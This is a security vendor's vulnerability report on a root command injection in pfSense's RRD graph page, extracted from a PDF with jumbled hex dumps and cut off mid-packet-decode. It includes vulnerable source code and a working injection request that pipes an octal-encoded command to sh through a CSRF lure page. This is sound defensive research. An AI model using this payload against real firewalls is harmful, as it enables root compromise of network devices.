Vulnerability Report (ESF PfSense Status_rrd_graph_img.php Command Injection)

TELUS Security Labs Vulnerability Research Service

ESF pfSense status_rrd_graph_img.php Command Injection Vulnerability Report - TSL20160419-04

Revision 1.0

Revision History Revision 1.0

2016-05-02

Copyright © 2004-2012 TELUS Security Labs PROPRIETARY AND CONFIDENTIAL

ESF pfSense status_rrd_graph_img.php Command Injection

Revision 1.0

Table of Contents 1. Identity of Problem ................................................................................................................................ 3 1.1. Brief Description ......................................................................................................................... 3 1.2. CVE Reference .......................................................................................................................... 3 1.3. OSVDB Reference ..................................................................................................................... 3 1.4. Vendor Advisory ......................................................................................................................... 3 1.5. Discoverer Advisory .................................................................................................................... 3 1.6. Other Advisories ......................................................................................................................... 3 1.7. Notes ......................................................................................................................................... 3 1.8. Vulnerability Classification and Severity ....................................................................................... 3 2. Affected Products .................................................................................................................................. 5 2.1. Products Directly Affected by the Vulnerability .............................................................................. 5 2.2. Other Products Embedding the Vulnerable Product ...................................................................... 5 3. Problem Location .................................................................................................................................. 6 3.1. Program ..................................................................................................................................... 6 3.2. Function or Method .................................................................................................................... 6 3.3. Parameters ................................................................................................................................ 6 3.4. Data Objects .............................................................................................................................. 6 4. Problem Mechanism .............................................................................................................................. 7 4.1. Technical Mechanism ................................................................................................................. 7 4.2. Source Code Walkthrough .......................................................................................................... 7 4.3. Open Questions to Resolve ........................................................................................................ 8 5. Triggering the Problem .......................................................................................................................... 9 5.1. Prerequisites .............................................................................................................................. 9 5.2. Triggering Conditions .................................................................................................................. 9 5.3. Protocol Flow Diagram ............................................................................................................... 9 5.4. Attack Delivery ........................................................................................................................... 9 5.5. Packet Decodes ......................................................................................................................... 9 6. Attack Detection .................................................................................................................................. 15 6.1. Remote Detection of Generic Attacks ........................................................................................ 15 6.2. Remote Detection of Known Exploits ......................................................................................... 15 7. Exploit Reproduction ............................................................................................................................ 17 7.1. Exploit Overview ....................................................................................................................... 17 7.2. Exploit Code ............................................................................................................................. 17 8. Public Exploits ..................................................................................................................................... 18 8.1. Public Exploit [SA] .................................................................................................................... 18 9. Remediation Details ............................................................................................................................. 19 10. Related Research .............................................................................................................................. 20 11. Credits .............................................................................................................................................. 21


2


Revision 1.0

1. Identity of Problem 1.1. Brief Description A Command Injection vulnerability has been reported in ESF pfSense. This vulnerability is due to status_rrd_graph_img.php incorrectly validating the graph HTTP parameter. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the status_rrd_graph_img.php URI. Remote unauthenticated attackers can leverage a CSRF vulnerability and entice an authenticated user to exploit this vulnerability. Successful exploitation will result in arbitrary command execution with root privileges.

1.2. CVE Reference This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.

1.3. OSVDB Reference This vulnerability has not been assigned an Open Source Vulnerability Database (OSVDB) identifier.

1.4. Vendor Advisory The vendor, ESF, has released an advisory addressing this vulnerability with the unique identifier pfSenseSA-16_01, dated 2016-04-01. Reference: https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc

1.5. Discoverer Advisory The discoverer, Francesco Oddo, has released an advisory addressing this vulnerability, dated 2016-04-15. Reference: http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf

1.6. Other Advisories There are no other advisories available.

1.7. Notes Not available.

1.8. Vulnerability Classification and Severity 1.8.1. TELUS Security Labs Classification Vulnerability impact: COMMAND EXECUTION Vulnerability type: INPUT VALIDATION ERROR

1.8.2. Common Weakness Enumeration (CWE) Classification • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Reference: https://cwe.mitre.org/data/definitions/78.html


3


Revision 1.0

1.8.3. Severity The severity classification of this vulnerability is high. This rating was determined through consideration of the following factors: • Exploit code is publicly available. • This is a server compromise. • The vulnerability, if exploited, can lead to a root or system-level compromise. • The software affected by this vulnerability is significantly deployed. • The assets affected by this vulnerability are estimated to be of high value. • The attacker must have limited user privileges.

1.8.4. Common Vulnerability Scoring System (CVSS) Base score is 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C), based on the following metrics: • Access vector is network. • Access complexity is medium. • Level of authentication required is single. • Impact of this vulnerability on data confidentiality is complete. • Impact of this vulnerability on data integrity is complete. • Impact of this vulnerability on data availability is complete. Temporal score is 7.0 (E:F/RL:OF/RC:C), based on the following metrics: • The exploitability level of this vulnerability is functional. • The remediation level of this vulnerability is official fix. • The report confidence level of this vulnerability is confirmed.


4


Revision 1.0

2. Affected Products 2.1. Products Directly Affected by the Vulnerability • Electric Sheep Fencing pfSense prior to 2.3

2.2. Other Products Embedding the Vulnerable Product Not applicable.


5


Revision 1.0

3. Problem Location 3.1. Program This vulnerable program is status_rrd_graph_img.php

3.2. Function or Method The vulnerable function is responsible for sanitizing special characters used in Shell commands.

3.3. Parameters The vulnerable parameter is the HTTP parameter graph.

3.4. Data Objects Not available.


6


Revision 1.0

4. Problem Mechanism 4.1. Technical Mechanism pfSense is a open source network firewall distribution based on the FreeBSD operating system. The distribution creates a simple and intuitive WebGUI for configuring and managing a network firewall. Configuration is managed either through the CLI or a web interface called the webConfigurator. The webConfigurator is a web application capable of configuring and managing the firewall as well as other components of the pfSense distribution. All interaction with the interface is performed via the HTTP protocol over port 80/TCP or securely over 443/TCP. HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various headers, an empty line, and an optional message body: Request = Request-Line headers CRLF [message-body] Request-Line = Method SP Request-URI SP HTTP-Version CRLF Headers = *[Header] Header = Field-Name ":" Field-Value CRLF

where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF). SP represents a space character. Parameters can be passed from the client to the server as name-value pairs in either the Request-URI, or in the message-body, depending on the Method used and Content-Type header. For example, a simple HTTP request passing a parameter named "param" with value "1", using the GET method might look like: GET /my_webapp/mypaget.htm?param=1 HTTP/1.1 Host: www.myhost.com

A corresponding HTTP request using the POST method might look like: POST /my_webapp/mypaget.htm HTTP/1.1 Host: www.myhost.com Content-Type: application/x-www-form-urlencoded Content-Length: 7 param=1

If there is more than one parameter/value pair, they are encoded as &-delimited name=value pairs: var1=value1&var2=value2...

A command injection vulnerability exists in ESF pfSense. This vulnerability is due to status_rrd_graph_img.php incorrectly sanitizing the graph HTTP parameter. Specifically, this PHP script fails to check for the pipe "|" (ASCII:0x7C) and grave accent "`" (ASCII:0x60) characters. The graph parameter is then used to construct a Shell command which is executed using the exec() function enabling less privileged users to inject arbitrary OS commands. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the status_rrd_graph_img.php URI. Remote unauthenticated attackers can leverage a CSRF vulnerability and entice an authenticated user to exploit this vulnerability. Successful exploitation will result in arbitrary command execution with root privileges.

4.2. Source Code Walkthrough The following code snippet was taken from status_rrd_graph_img.php version 2.2.6. Comments added by TELUS Security Labs have been highlighted. $pgtitle = array(gettext("System"),gettext("RRD Graphs"),gettext("Image viewer")); if ($_GET['database']) { //this param not exploitable due to future checks $curdatabase = basename($_GET['database']); $curdatabase = str_replace(array("<", ">", ";", "&", "'", '"'), "",


7


Revision 1.0

htmlspecialchars_decode($curdatabase, ENT_QUOTES | ENT_HTML401)); } else { $curdatabase = "wan-traffic.rrd"; } if ($_GET['style']) { $curstyle = $_GET['style']; } else { $curstyle = "inverse"; } /* this is used for temp name */ if ($_GET['graph']) { //no check for "|" or "`" $curgraph = str_replace(array("<", ">", ";", "&", "'", '"', '.', '/'), "", htmlspecialchars_decode($_GET['graph'], ENT_QUOTES | ENT_HTML401)); } else { $curgraph = "custom"; } [...Truncated for readability...] //vulnerable exec() below //$curgraph is used to generate $graphcmd if (file_exists("$rrdtmppath$curdatabase-$curgraph.png")) { if ((time() - filemtime("$rrdtmppath$curdatabase-$curgraph.png")) >= 15 ) { if ($data) { $_gb = exec("$graphcmd 2>&1", $graphcmdoutput, $graphcmdreturn); $graphcmdoutput = implode(" ", $graphcmdoutput) . $graphcmd; flush(); usleep(500); } } } else { if ($data) { $_gb = exec("$graphcmd 2>&1", $graphcmdoutput, $graphcmdreturn); $graphcmdoutput = implode(" ", $graphcmdoutput) . $graphcmd; flush(); usleep(500); } }

4.3. Open Questions to Resolve Not available.


8


Revision 1.0

5. Triggering the Problem 5.1. Prerequisites • The server must have the vulnerable product installed and running. • The attacker must be able to entice a user to visit a malicious website.

5.2. Triggering Conditions The attacker entices a user to send a HTTP request containing malicious shell commands in the affected parameter to the affected parameter. The vulnerability is triggered when the server processes this request.

5.3. Protocol Flow Diagram 5.3.1. Request/responses sequences, static or negotiated/ephemeral ports, etc An authenticated target user is enticed to click on a hyperlink: [ Attacker ] -----------------> [ Target User ]

The target user sends the crafted HTTP request to the target server: [ Target User ] -----------------> [ Target Server ]

5.4. Attack Delivery 5.4.1. Application protocols The following application protocols can be used to deliver an attack that exploits this vulnerability: • HTTP, over port 80/TCP • HTTPS, over port 80/TCP

5.4.2. IP protocols Not available.

5.4.3. File based vectors Not available.

5.4.4. Notes Not applicable.

5.5. Packet Decodes 5.5.1. Normal traffic (baseline) The following packet decode illustrates a normal packet exchange. Please refer to the attached file normal.pcap for details. A client sends a request: Frame 4: 492 bytes on wire (3936 bits), 492 bytes captured (3936 bits)


9


Revision 1.0

Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: Vmware_bd:7f:60 (00:50:56:bd:7f:60) Internet Protocol Version 4, Src: 172.16.8.206 (172.16.8.206), Dst: 172.16.8.192 (172.16.8.192) Transmission Control Protocol, Src Port: 49344 (49344), Dst Port: http (80), Seq: 1, Ack: 1, Len: 438 Hypertext Transfer Protocol GET /status_rrd_graph_img.php HTTP/1.1\r\n Host: 172.16.8.192\r\n Connection: keep-alive\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n Upgrade-Insecure-Requests: 1\r\n User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36\r\n Accept-Encoding: gzip, deflate, sdch\r\n Accept-Language: en-US,en;q=0.8\r\n Cookie: PHPSESSID=35edee32158c1a2a39b76b97ca8eaaa6\r\n \r\n 0000 00 50 56 bd 0010 01 de 0e 5a 0020 08 c0 c0 c0 0030 fa f0 f7 3c 0040 73 5f 72 72 0050 70 68 70 20 0060 73 74 3a 20 0070 0d 0a 43 6f 0080 65 70 2d 61 0090 3a 20 74 65 00a0 69 63 61 74 00b0 6c 2c 61 70 00c0 6c 3b 71 3d 00d0 62 70 2c 2a 00e0 67 72 61 64 00f0 65 71 75 65 0100 2d 41 67 65 0110 35 2e 30 20 0120 36 2e 31 29 0130 2f 35 33 37 0140 6c 69 6b 65 0150 6d 65 2f 35 0160 53 61 66 61 0170 63 63 65 70 0180 67 7a 69 70 0190 64 63 68 0d 01a0 75 61 67 65 01b0 3d 30 2e 38 01c0 50 53 45 53 01d0 31 35 38 63 [...Truncated for 01e0 63 61 38 65

7f 60 00 50 56 bd 40 00 80 06 81 11 00 50 90 2b b3 5b 00 00 47 45 54 20 64 5f 67 72 61 70 48 54 54 50 2f 31 31 37 32 2e 31 36 6e 6e 65 63 74 69 6c 69 76 65 0d 0a 78 74 2f 68 74 6d 69 6f 6e 2f 78 68 70 6c 69 63 61 74 30 2e 39 2c 69 6d 2f 2a 3b 71 3d 30 65 2d 49 6e 73 65 73 74 73 3a 20 31 6e 74 3a 20 4d 6f 28 57 69 6e 64 6f 20 41 70 70 6c 65 2e 33 36 20 28 4b 20 47 65 63 6b 6f 30 2e 30 2e 32 36 72 69 2f 35 33 37 74 2d 45 6e 63 6f 2c 20 64 65 66 6c 0a 41 63 63 65 70 3a 20 65 6e 2d 55 0d 0a 43 6f 6f 6b 53 49 44 3d 33 35 31 61 32 61 33 39 readability...] 61 61 61 36 0d 0a

e4 ac fa 2f 68 2e 2e 6f 41 6c 74 69 61 2e 63 0d 7a 77 57 48 29 36 2e 64 61 74 53 69 65 62

13 10 4d 73 5f 31 38 6e 63 2c 6d 6f 67 38 75 0a 69 73 65 54 20 31 33 69 74 2d 2c 65 64 37

08 08 4d 74 69 0d 2e 3a 63 61 6c 6e 65 0d 72 55 6c 20 62 4d 43 2e 36 6e 65 4c 65 3a 65 36

00 ce 1a 61 6d 0a 31 20 65 70 2b 2f 2f 0a 65 73 6c 4e 4b 4c 68 37 0d 67 2c 61 6e 20 65 62

45 ac 50 74 67 48 39 6b 70 70 78 78 77 55 2d 65 61 54 69 2c 72 35 0a 3a 20 6e 3b 50 33 39

00 10 18 75 2e 6f 32 65 74 6c 6d 6d 65 70 52 72 2f 20 74 20 6f 20 41 20 73 67 71 48 32 37

0d 0a

.PV..`.PV.....E. ...Z@........... .....P.+.[.MM.P. ...<..GET /statu s_rrd_graph_img. php HTTP/1.1..Ho st: 172.16.8.192 ..Connection: ke ep-alive..Accept : text/html,appl ication/xhtml+xm l,application/xm l;q=0.9,image/we bp,*/*;q=0.8..Up grade-Insecure-R equests: 1..User -Agent: Mozilla/ 5.0 (Windows NT 6.1) AppleWebKit /537.36 (KHTML, like Gecko) Chro me/50.0.2661.75 Safari/537.36..A ccept-Encoding: gzip, deflate, s dch..Accept-Lang uage: en-US,en;q =0.8..Cookie: PH PSESSID=35edee32 158c1a2a39b76b97 ca8eaaa6....

The server responds: Frame 6: 1514 bytes on wire (12112 bits), 1514 bytes captured (12112 bits) Ethernet II, Src: Vmware_bd:7f:60 (00:50:56:bd:7f:60), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13) Internet Protocol Version 4, Src: 172.16.8.192 (172.16.8.192), Dst: 172.16.8.206 (172.16.8.206) Transmission Control Protocol, Src Port: http (80), Dst Port: 49344 (49344), Seq: 1, Ack: 439, Len: 1460 Hypertext Transfer Protocol HTTP/1.1 200 OK\r\n Expires: Sat, 30 Apr 2016 20:31:34 GMT\r\n Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n Cache-Control: max-age=180000\r\n Cache-Control: no-store, no-cache, must-revalidate\r\n Cache-Control: post-check=0, pre-check=0\r\n X-Frame-Options: SAMEORIGIN\r\n Content-type: image/png\r\n Last-Modified: Thu, 28 Apr 2016 18:31:35 GMT\r\n Pragma: no-cache\r\n Transfer-Encoding: chunked\r\n Date: Thu, 28 Apr 2016 18:31:35 GMT\r\n Server: lighttpd/1.4.38\r\n \r\n HTTP chunked response 0000 0010 0020 0030

00 05 08 ff

50 dc ce ff

56 46 00 48

bd 7f 50 d5

e4 40 c0 00

13 00 c0 00

00 40 fa 48

50 06 4d 54

56 84 4d 54

bd ee 1a 50

7f ac 90 2f

60 10 2b 31


08 08 b5 2e

00 c0 11 31

45 ac 50 20

00 10 10 32

.PV....PV..`..E. ..F.@.@......... ...P...MM..+..P. ..H...HTTP/1.1 2

10


0040 30 30 20 4f 0050 53 61 74 2c 0060 20 32 30 3a 0070 78 70 69 72 0080 4a 75 6c 20 0090 30 20 47 4d 00a0 74 72 6f 6c 00b0 30 30 30 30 00c0 72 6f 6c 3a 00d0 6f 2d 63 61 00e0 76 61 6c 69 00f0 43 6f 6e 74 0100 65 63 6b 3d 0110 3d 30 0d 0a 0120 6f 6e 73 3a 0130 0a 43 6f 6e 0140 6d 61 67 65 0150 6f 64 69 66 0160 20 41 70 72 0170 33 35 20 47 0180 6e 6f 2d 63 0190 65 72 2d 45 01a0 6e 6b 65 64 01b0 20 32 38 20 01c0 33 31 3a 33 01d0 72 3a 20 6c [...Truncated for 05c0 23 cc a2 45 05d0 dc c7 54 52 05e0 a7 33 ff 84

4b 0d 0a 45 78 70 20 33 30 20 41 70 33 31 3a 33 34 20 65 73 3a 20 4d 6f 31 39 39 37 20 30 54 0d 0a 43 61 63 3a 20 6d 61 78 2d 0d 0a 43 61 63 68 20 6e 6f 2d 73 74 63 68 65 2c 20 6d 64 61 74 65 0d 0a 72 6f 6c 3a 20 70 30 2c 20 70 72 65 58 2d 46 72 61 6d 20 53 41 4d 45 4f 74 65 6e 74 2d 74 2f 70 6e 67 0d 0a 69 65 64 3a 20 54 20 32 30 31 36 20 4d 54 0d 0a 50 72 61 63 68 65 0d 0a 6e 63 6f 64 69 6e 0d 0a 44 61 74 65 41 70 72 20 32 30 35 20 47 4d 54 0d 69 67 68 74 74 70 readability...] 8b 1a ea 4b c3 b8 7a cc 98 31 e6 73 18 d7 c8 6f 66 9c

69 72 47 6e 35 68 61 65 6f 75 43 6f 2d 65 52 79 4c 68 31 61 54 67 3a 31 0a 64

72 20 4d 2c 3a 65 67 2d 72 73 61 73 63 2d 49 70 61 75 38 67 72 3a 20 36 53 2f

65 32 54 20 30 2d 65 43 65 74 63 74 68 4f 47 65 73 2c 3a 6d 61 20 54 20 65 31

Revision 1.0

73 30 0d 32 30 43 3d 6f 2c 2d 68 2d 65 70 49 3a 74 20 33 61 6e 63 68 31 72 2e

3a 31 0a 36 3a 6f 31 6e 20 72 65 63 63 74 4e 20 2d 32 31 3a 73 68 75 38 76 34

20 36 45 20 30 6e 38 74 6e 65 2d 68 6b 69 0d 69 4d 38 3a 20 66 75 2c 3a 65 2e

00 OK..Expires: Sat, 30 Apr 2016 20:31:34 GMT..E xpires: Mon, 26 Jul 1997 05:00:0 0 GMT..Cache-Con trol: max-age=18 0000..Cache-Cont rol: no-store, n o-cache, must-re validate..CacheControl: post-ch eck=0, pre-check =0..X-Frame-Opti ons: SAMEORIGIN. .Content-type: i mage/png..Last-M odified: Thu, 28 Apr 2016 18:31: 35 GMT..Pragma: no-cache..Transf er-Encoding: chu nked..Date: Thu, 28 Apr 2016 18: 31:35 GMT..Serve r: lighttpd/1.4.

dd e3 a9 6a bf aa 9f fb 9c 79 fa e9

#..E...K.....j.. ..TRz..1.s...y.. .3.....of.

5.5.2. Attack cases The following packet decode illustrates an attack packet exchange. Please refer to the attached file attack.pcap for details. A client is enticed to visit a malicious website: Frame 4: 444 bytes on wire (3552 bits), 444 bytes captured (3552 bits) Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: HewlettP_f1:4a:7d (a0:d3:c1:f1:4a:7d) Internet Protocol Version 4, Src: 172.16.8.206 (172.16.8.206), Dst: 172.16.1.2 (172.16.1.2) Transmission Control Protocol, Src Port: 49359 (49359), Dst Port: http (80), Seq: 1, Ack: 1, Len: 390 Hypertext Transfer Protocol GET /~ssivakumaran/pfsense/poc.html HTTP/1.1\r\n Host: 172.16.1.2\r\n Connection: keep-alive\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n Upgrade-Insecure-Requests: 1\r\n User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36\r\n Accept-Encoding: gzip, deflate, sdch\r\n Accept-Language: en-US,en;q=0.8\r\n \r\n 0000 0010 0020 0030 0040 0050 0060 0070 0080 0090 00a0 00b0 00c0 00d0 00e0 00f0 0100 0110 0120 0130

a0 01 01 01 61 2f 2e 2e 3a 63 61 6c 6e 65 0d 72 55 6c 20 62

d3 ae 02 00 6b 70 31 31 20 65 70 2b 2f 2f 0a 65 73 6c 4e 4b

c1 11 c0 5e 75 6f 0d 2e 6b 70 70 78 78 77 55 2d 65 61 54 69

f1 45 cf 3c 6d 63 0a 32 65 74 6c 6d 6d 65 70 52 72 2f 20 74

4a 40 00 00 61 2e 48 0d 65 3a 69 6c 6c 62 67 65 2d 35 36 2f

7d 00 50 00 72 68 6f 0a 70 20 63 2c 3b 70 72 71 41 2e 2e 35

00 80 d8 47 61 74 73 43 2d 74 61 61 71 2c 61 75 67 30 31 33

50 06 27 45 6e 6d 74 6f 61 65 74 70 3d 2a 64 65 65 20 29 37

56 86 1e 54 2f 6c 3a 6e 6c 78 69 70 30 2f 65 73 6e 28 20 2e

bd 14 87 20 70 20 20 6e 69 74 6f 6c 2e 2a 2d 74 74 57 41 33

e4 ac d5 2f 66 48 31 65 76 2f 6e 69 39 3b 49 73 3a 69 70 36

13 10 9a 7e 73 54 37 63 65 68 2f 63 2c 71 6e 3a 20 6e 70 20


08 08 57 73 65 54 32 74 0d 74 78 61 69 3d 73 20 4d 64 6c 28

00 ce c2 73 6e 50 2e 69 0a 6d 68 74 6d 30 65 31 6f 6f 65 4b

45 ac 50 69 73 2f 31 6f 41 6c 74 69 61 2e 63 0d 7a 77 57 48

00 10 18 76 65 31 36 6e 63 2c 6d 6f 67 38 75 0a 69 73 65 54

....J}.PV.....E. ...E@........... .....P.'....W.P. ..^<..GET /~ssiv akumaran/pfsense /poc.html HTTP/1 .1..Host: 172.16 .1.2..Connection : keep-alive..Ac cept: text/html, application/xhtm l+xml,applicatio n/xml;q=0.9,imag e/webp,*/*;q=0.8 ..Upgrade-Insecu re-Requests: 1.. User-Agent: Mozi lla/5.0 (Windows NT 6.1) AppleWe bKit/537.36 (KHT

11


0140 0150 0160 0170 0180 0190 01a0 01b0

4d 43 2e 36 6e 65 4c 65

4c 68 37 0d 67 2c 61 6e

2c 72 35 0a 3a 20 6e 3b

20 6f 20 41 20 73 67 71

6c 6d 53 63 67 64 75 3d

69 65 61 63 7a 63 61 30

6b 2f 66 65 69 68 67 2e

65 35 61 70 70 0d 65 38

20 30 72 74 2c 0a 3a 0d

47 2e 69 2d 20 41 20 0a

65 30 2f 45 64 63 65 0d

63 2e 35 6e 65 63 6e 0a

6b 32 33 63 66 65 2d

Revision 1.0

6f 36 37 6f 6c 70 55

29 36 2e 64 61 74 53

20 31 33 69 74 2d 2c

ML, like Gecko) Chrome/50.0.2661 .75 Safari/537.3 6..Accept-Encodi ng: gzip, deflat e, sdch..AcceptLanguage: en-US, en;q=0.8....

Malicious server responds: Frame 6: 717 bytes on wire (5736 bits), 717 bytes captured (5736 bits) Ethernet II, Src: HewlettP_f1:4a:7d (a0:d3:c1:f1:4a:7d), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13) Internet Protocol Version 4, Src: 172.16.1.2 (172.16.1.2), Dst: 172.16.8.206 (172.16.8.206) Transmission Control Protocol, Src Port: http (80), Dst Port: 49359 (49359), Seq: 1, Ack: 391, Len: 663 Hypertext Transfer Protocol HTTP/1.1 200 OK\r\n Date: Thu, 28 Apr 2016 18:47:12 GMT\r\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 mod_wsgi/3.4 Python/2.7.5\r\n Last-Modified: Thu, 28 Apr 2016 18:31:18 GMT\r\n ETag: "133-5318fbb6ba130"\r\n Accept-Ranges: bytes\r\n Content-Length: 307\r\n Keep-Alive: timeout=5, max=100\r\n Connection: Keep-Alive\r\n Content-Type: text/html; charset=UTF-8\r\n \r\n Line-based text data: text/html \n \n 0000 00 50 56 bd 0010 02 bf 01 69 0020 08 ce 00 50 0030 00 7b 93 ab 0040 30 30 20 4f 0050 2c 20 32 38 0060 3a 34 37 3a 0070 65 72 3a 20 0080 20 28 43 65 0090 4c 2f 31 2e 00a0 50 2f 35 2e 00b0 69 2f 33 2e 00c0 2e 35 0d 0a 00d0 64 3a 20 54 00e0 30 31 36 20 00f0 0d 0a 45 54 0100 38 66 62 62 0110 65 70 74 2d 0120 73 0d 0a 43 0130 68 3a 20 33 0140 76 65 3a 20 0150 61 78 3d 31 0160 6f 6e 3a 20 0170 43 6f 6e 74 0180 78 74 2f 68 0190 3d 55 54 46 01a0 0a 20 20 3c 01b0 69 74 6c 65 01c0 69 74 79 20 01d0 74 6c 65 3e [...Truncated for 02a0 68 6f 22 3e 02b0 6f 72 20 50 02c0 6f 64 79 3e

e4 13 a0 d3 c1 f1 40 00 40 06 d4 df c0 cf d5 9a 57 c2 00 00 48 54 54 50 4b 0d 0a 44 61 74 20 41 70 72 20 32 31 32 20 47 4d 54 41 70 61 63 68 65 6e 74 4f 53 29 20 30 2e 31 65 2d 66 34 2e 31 36 20 6d 34 20 50 79 74 68 4c 61 73 74 2d 4d 68 75 2c 20 32 38 31 38 3a 33 31 3a 61 67 3a 20 22 31 36 62 61 31 33 30 52 61 6e 67 65 73 6f 6e 74 65 6e 74 30 37 0d 0a 4b 65 74 69 6d 65 6f 75 30 30 0d 0a 43 6f 4b 65 65 70 2d 41 65 6e 74 2d 54 79 74 6d 6c 3b 20 63 2d 38 0d 0a 0d 0a 68 65 61 64 3e 0a 3e 54 45 4c 55 53 4c 61 62 73 20 50 0a 20 20 3c 2f 68 readability...] 43 6c 69 63 6b 20 6f 43 3c 2f 61 3e 0a 3c 2f 68 74 6d

4a ac d8 2f 65 30 0d 2f 4f 69 6f 6f 6f 20 31 33 22 3a 2d 65 74 6e 6c 70 68 3c 20 20 6f 65

7d 10 27 31 3a 31 0a 32 70 70 64 6e 64 41 38 33 0d 20 4c 70 3d 6e 69 65 61 68 20 53 43 61

08 01 20 2e 20 36 53 2e 65 73 5f 2f 69 70 20 2d 0a 62 65 2d 35 65 76 3a 72 74 20 65 3c 64

00 02 0d 31 54 20 65 34 6e 20 77 32 66 72 47 35 41 79 6e 41 2c 63 65 20 73 6d 20 63 2f 3e

45 ac 50 20 68 31 72 2e 53 50 73 2e 69 20 4d 33 63 74 67 6c 20 74 0d 74 65 6c 3c 75 74 0a

00 10 18 32 75 38 76 36 53 48 67 37 65 32 54 31 63 65 74 69 6d 69 0a 65 74 3e 74 72 69 20

.PV.......J}..E. ...i@.@......... ...P....W..' .P. .{....HTTP/1.1 2 00 OK..Date: Thu , 28 Apr 2016 18 :47:12 GMT..Serv er: Apache/2.4.6 (CentOS) OpenSS L/1.0.1e-fips PH P/5.4.16 mod_wsg i/3.4 Python/2.7 .5..Last-Modifie d: Thu, 28 Apr 2 016 18:31:18 GMT ..ETag: "133-531 8fbb6ba130"..Acc ept-Ranges: byte s..Content-Lengt h: 307..Keep-Ali ve: timeout=5, m ax=100..Connecti on: Keep-Alive.. Content-Type: te xt/html; charset =UTF-8.... . . TELUS Secur ity Labs PoC. .

68 65 72 65 20 66 0a 20 20 3c 2f 62 6c 3e 0a

ho">Click here f or PoC. ..

The client sends a crafted request to the server: Frame 11: 680 bytes on wire (5440 bits), 680 bytes captured (5440 bits) Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: Vmware_bd:7f:60 (00:50:56:bd:7f:60) Internet Protocol Version 4, Src: 172.16.8.206 (172.16.8.206), Dst: 172.16.8.192 (172.16.8.192) Transmission Control Protocol, Src Port: 49360 (49360), Dst Port: http (80), Seq: 1, Ack: 1, Len: 626 Hypertext Transfer Protocol GET /status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20\\164\\157\\165 \\143\\150\\040\\057\\164\\155\\160\\057\\164\\145\\163\\164|sh|echo


12


Revision 1.0

HTTP/1.1\r\n Host: 172.16.8.192\r\n Connection: keep-alive\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n Upgrade-Insecure-Requests: 1\r\n User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36\r\n Referer: http://172.16.1.2/~ssivakumaran/pfsense/poc.html\r\n Accept-Encoding: gzip, deflate, sdch\r\n Accept-Language: en-US,en;q=0.8\r\n Cookie: PHPSESSID=9ef619062013b1690743c6265f32a760\r\n \r\n 0000 00 50 56 bd 0010 02 9a 11 4c 0020 08 c0 c0 d0 0030 01 00 3b 44 0040 73 5f 72 72 0050 70 68 70 3f 0060 72 6f 75 67 0070 70 68 3d 66 0080 30 5c 5c 31 0090 5c 5c 31 34 00a0 5c 30 35 37 00b0 31 36 30 5c 00c0 34 35 5c 5c 00d0 65 63 68 6f 00e0 6f 73 74 3a 00f0 32 0d 0a 43 0100 65 65 70 2d 0110 74 3a 20 74 0120 6c 69 63 61 0130 6d 6c 2c 61 0140 6d 6c 3b 71 0150 65 62 70 2c 0160 70 67 72 61 0170 52 65 71 75 0180 72 2d 41 67 0190 2f 35 2e 30 01a0 20 36 2e 31 01b0 74 2f 35 33 01c0 20 6c 69 6b 01d0 6f 6d 65 2f [...Truncated for 0280 53 49 44 3d 0290 62 31 36 39 02a0 61 37 36 30

7f 60 00 50 56 bd 40 00 80 06 7d 63 00 50 b4 59 66 5b 00 00 47 45 54 20 64 5f 67 72 61 70 64 61 74 61 62 61 68 70 75 74 2e 72 69 6c 65 7c 70 72 36 34 5c 5c 31 35 33 5c 5c 31 35 30 5c 5c 31 36 34 5c 5c 30 35 37 5c 5c 31 36 33 5c 5c 31 20 48 54 54 50 2f 20 31 37 32 2e 31 6f 6e 6e 65 63 74 61 6c 69 76 65 0d 65 78 74 2f 68 74 74 69 6f 6e 2f 78 70 70 6c 69 63 61 3d 30 2e 39 2c 69 2a 2f 2a 3b 71 3d 64 65 2d 49 6e 73 65 73 74 73 3a 20 65 6e 74 3a 20 4d 20 28 57 69 6e 64 29 20 41 70 70 6c 37 2e 33 36 20 28 65 20 47 65 63 6b 35 30 2e 30 2e 32 readability...] 39 65 66 36 31 39 30 37 34 33 63 36 0d 0a 0d 0a

e4 ac 16 2f 68 73 72 69 37 5c 5c 31 36 31 36 69 0a 6d 68 74 6d 30 65 31 6f 6f 65 4b 6f 36

13 10 f6 73 5f 65 64 6e 5c 5c 31 36 34 2e 2e 6f 41 6c 74 69 61 2e 63 0d 7a 77 57 48 29 36

08 08 a6 74 69 3d 26 74 5c 30 35 34 7c 31 38 6e 63 2c 6d 6f 67 38 75 0a 69 73 65 54 20 31

00 ce e9 61 6d 2d 67 66 31 34 35 5c 73 0d 2e 3a 63 61 6c 6e 65 0d 72 55 6c 20 62 4d 43 2e

45 ac 50 74 67 74 72 25 36 30 5c 5c 68 0a 31 20 65 70 2b 2f 2f 0a 65 73 6c 4e 4b 4c 68 37

